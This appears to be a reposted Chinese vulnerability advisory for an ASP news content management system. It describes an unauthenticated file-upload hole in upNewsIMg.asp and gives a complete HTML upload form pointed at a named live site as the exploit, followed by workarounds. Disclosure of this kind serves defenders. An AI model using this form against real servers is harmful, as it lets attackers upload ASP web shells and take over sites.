大志网站内容管理系统Professional 2.0漏洞

简介:
信息来源: [url]www.neeao.com[/url]

漏洞发现:Neeao
程序名称:大志网站内容管理系统
漏洞版本:Professional 2.0 bulid 20040905 
系统开发:大志工作室 
官方地址:_blank> [url]http://www.wytg.net/[/url]
漏洞说明:上传漏洞

程序说明:是基于ASP开发的一套网络新闻文章管理系统,从首页、类别网页(包括类别分页)一直到文章阅读页面,自动生成
全静态HTML页面!

漏洞描述:其所使用的上传新闻图片文件upNewsIMg.asp,没有对上传文件后缀做判断,导致可以直接上传asp文件。
更重要的是,在这个文件中没有给出权限验证,可以直接利用本文件上传Asp文件!

利用方法:构造一个提交表单即可上传asp文件!如下:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <html>
<head>
<title>文件上传</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="_blank> [url]http://www.xbgqxx.com/upload/upNewsIMg.asp[/url] " enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>图片上传</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<script language="javascript">
  function setid()
  {
  str='<br>';
  if(!window.form1.upcount.value)
  window.form1.upcount.value=2;
  if(window.form1.upcount.value>100){
  alert("您最多只能同时上传100个文件0");
  window.form1.upcount.value = 100;
  setid();
  }
  else{
  for(i=1;i<=window.form1.upcount.value;i++)
  str+='<div align="left">待传图片'+i+':<input type="file" name="file'+i+'" style="width:200" class="tx1"></div>';
  window.upid.innerHTML=str+'<br>';}
  }
  </script>
上传个数: 
<input type="text" class="tx" value="2" name="upcount" size="20">
<input type="button" name="Button" class="bt" value="· 设定 ·">

</td>
</tr>
<tr align="center" valign="middle">
<td align="left" id="upid" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· 提交 ·" class="bt">
<input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>

</body>

</html> 


厂商补丁:暂时没有

临时解决方法:
1、在文件upNewsIMg.asp加入:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <!--#i nclude FILE="../admin/check.asp"--> 

限制一般会员的权限,禁止其使用上传功能。

2、直接删除这个文件!


















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8582 ,如需转载请自行联系原作者


相关文章
|
6月前
|
人工智能 Windows
基于语雀的windows解决小问题知识库
基于语雀的windows解决小问题知识库
38 0
|
安全
CNVD-2021-49104——泛微E-Office文件上传漏洞
CNVD-2021-49104——泛微E-Office文件上传漏洞
486 1
CNVD-2021-49104——泛微E-Office文件上传漏洞
|
安全 项目管理
【web渗透】appscan 免费版下载
【web渗透】appscan 免费版下载
127 0
|
PHP 开发工具 数据库
Windows 下安装开源自媒体内容管理系统 MyCms
Windows 下安装开源自媒体内容管理系统 MyCms
209 0
Windows 下安装开源自媒体内容管理系统 MyCms
|
安全
关于Joomla!内容管理系统漏洞情况的通报
本文讲的是关于Joomla!内容管理系统漏洞情况的通报,近日,国家信息安全漏洞库(CNNVD)收到北京白帽汇科技有限公司关于Joomla!内容管理系统存在安全绕过漏洞(CNNVD-201610-739)及远程提权漏洞(CNNVD-201610-740)的情况报送。
1645 0